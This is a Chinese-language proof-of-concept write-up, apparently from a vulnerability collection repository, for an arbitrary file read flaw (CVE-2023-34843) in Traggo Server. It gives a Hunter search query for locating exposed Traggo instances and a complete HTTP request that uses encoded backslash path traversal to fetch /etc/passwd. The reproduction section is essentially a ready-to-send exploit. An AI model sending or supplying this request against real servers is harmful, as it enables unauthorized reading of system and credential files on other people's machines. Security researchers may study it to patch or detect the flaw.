POC/wpoc/Traggo/TraggoServer任意文件读取漏洞(CVE-2023-34843).md

36 lines
1.3 KiB
Markdown
Raw Normal View History

2025-03-04 23:12:57 +08:00
# Traggo Server任意文件读取漏洞(CVE-2023-34843)
# 一、漏洞简介
`Traggo Server`是一个基于标签的时间跟踪工具。在`Traggo`中,没有任务,只有标记的时间跨度。可以用来跟踪、分析每天时间用在哪些地方,方便更好的管理时间,提高效率。`Traggo`存在任意文件读取漏洞。
## 二、影响版本
+ `Traggo Server`
# 三、资产测绘
+ hunter`app.name="Traggo"`
+ 登录页面
![1693741695368-68067cc7-61f5-4530-b5a9-52f16a282aa5.png](./img/VlgslYayTvwObt7Z/1693741695368-68067cc7-61f5-4530-b5a9-52f16a282aa5-647572.png)
# 四、漏洞复现
```java
GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/2
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
```
![1693741775280-eb64edb6-8d52-406d-bcce-f9d83ee9f3c4.png](./img/VlgslYayTvwObt7Z/1693741775280-eb64edb6-8d52-406d-bcce-f9d83ee9f3c4-724816.png)
> 更新: 2024-02-29 23:57:33
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gcc1enullkmmd0hf>